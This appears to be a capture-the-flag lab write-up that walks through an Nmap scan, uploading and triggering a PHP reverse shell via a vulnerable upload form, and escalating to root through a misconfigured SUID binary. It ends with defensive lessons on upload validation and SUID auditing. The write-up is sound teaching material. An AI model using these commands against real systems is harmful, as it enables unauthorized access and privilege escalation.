This machine presented an interesting challenge combining web application vulnerabilities with Linux privilege escalation techniques. The initial foothold was gained through a vulnerable file upload functionality, followed by exploiting misconfigured SUID binaries.
Reconnaissance
Starting with an Nmap scan to identify open ports and services running on the target machine.
nmap -sC -sV -oN nmap/initial 10.10.10.x
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1
80/tcp open http Apache httpd 2.4.41Initial Foothold
The web application on port 80 revealed a file upload functionality that was vulnerable to unrestricted file upload attacks.
# Uploading a PHP reverse shell
curl -X POST -F "file=@shell.php" http://10.10.10.x/upload.php
# Triggering the shell
curl http://10.10.10.x/uploads/shell.phpPrivilege Escalation
After gaining initial access, enumeration revealed a misconfigured SUID binary that could be exploited for privilege escalation.
# Finding SUID binaries
find / -perm -4000 2>/dev/null
# Exploiting the vulnerable binary
./vulnerable_binary -e /bin/bash
# Verifying root access
id
uid=0(root) gid=0(root) groups=0(root)Conclusion
This machine demonstrated the importance of proper input validation in file upload functionalities and the risks associated with misconfigured SUID binaries. Key takeaways include always validating file types server-side and regularly auditing SUID permissions on Linux systems.